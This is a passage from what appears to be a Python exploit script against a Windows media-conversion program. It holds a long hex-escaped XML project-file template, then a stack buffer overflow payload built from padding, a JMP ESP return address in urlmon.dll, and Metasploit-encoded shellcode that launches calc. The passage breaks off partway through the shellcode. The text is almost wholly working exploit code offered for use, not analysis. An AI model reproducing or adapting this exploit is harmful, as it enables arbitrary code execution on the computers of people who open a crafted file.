"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
payload += struct.pack("<L",0x781c2014 )  # JMP ESP [urlmon.dll]
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
